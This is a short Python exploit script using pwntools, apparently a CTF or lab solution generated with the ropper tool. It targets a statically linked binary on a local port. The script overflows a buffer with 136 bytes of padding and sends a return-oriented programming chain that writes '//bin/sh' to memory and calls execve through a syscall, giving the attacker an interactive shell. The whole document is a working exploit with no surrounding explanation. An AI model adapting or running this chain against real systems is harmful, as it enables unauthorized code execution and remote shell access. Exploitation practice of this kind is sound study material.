#!/usr/bin/env python
# Generated by ropper ropchain generator #
import struct
from pwn import *
#context.log_level = 'debug'

#t = process('./static')
t = remote('127.0.0.1',1234)

t.recvuntil('Hello, World\n')

p = lambda x : struct.pack('Q', x)

IMAGE_BASE_0 = 0x0000000000400000 # a2e85d75e46bd217698533ccf01b2ffe591748b7a8ff0de9825f1e57424cfd75
rebase_0 = lambda x : p(x + IMAGE_BASE_0)

rop = 'A'*136

rop += rebase_0(0x000000000000da7b) # 0x000000000040da7b: pop r13; ret; 
rop += '//bin/sh'
rop += rebase_0(0x0000000000000686) # 0x0000000000400686: pop rdi; ret; 
rop += rebase_0(0x00000000002b90e0)
rop += rebase_0(0x0000000000068179) # 0x0000000000468179: mov qword ptr [rdi], r13; pop rbx; pop rbp; pop r12; pop r13; ret; 
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += rebase_0(0x000000000000da7b) # 0x000000000040da7b: pop r13; ret; 
rop += p(0x0000000000000000)
rop += rebase_0(0x0000000000000686) # 0x0000000000400686: pop rdi; ret; 
rop += rebase_0(0x00000000002b90e8)
rop += rebase_0(0x0000000000068179) # 0x0000000000468179: mov qword ptr [rdi], r13; pop rbx; pop rbp; pop r12; pop r13; ret; 
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += rebase_0(0x0000000000000686) # 0x0000000000400686: pop rdi; ret; 
rop += rebase_0(0x00000000002b90e0)
rop += rebase_0(0x00000000000100b3) # 0x00000000004100b3: pop rsi; ret; 
rop += rebase_0(0x00000000002b90e8)
rop += rebase_0(0x000000000004b836) # 0x000000000044b836: pop rdx; ret; 
rop += rebase_0(0x00000000002b90e8)
rop += rebase_0(0x00000000000150b4) # 0x00000000004150b4: pop rax; ret; 
rop += p(0x000000000000003b)
rop += rebase_0(0x0000000000074885) # 0x0000000000474885: syscall; ret; 
# print rop
t.sendline(rop)

t.interactive()
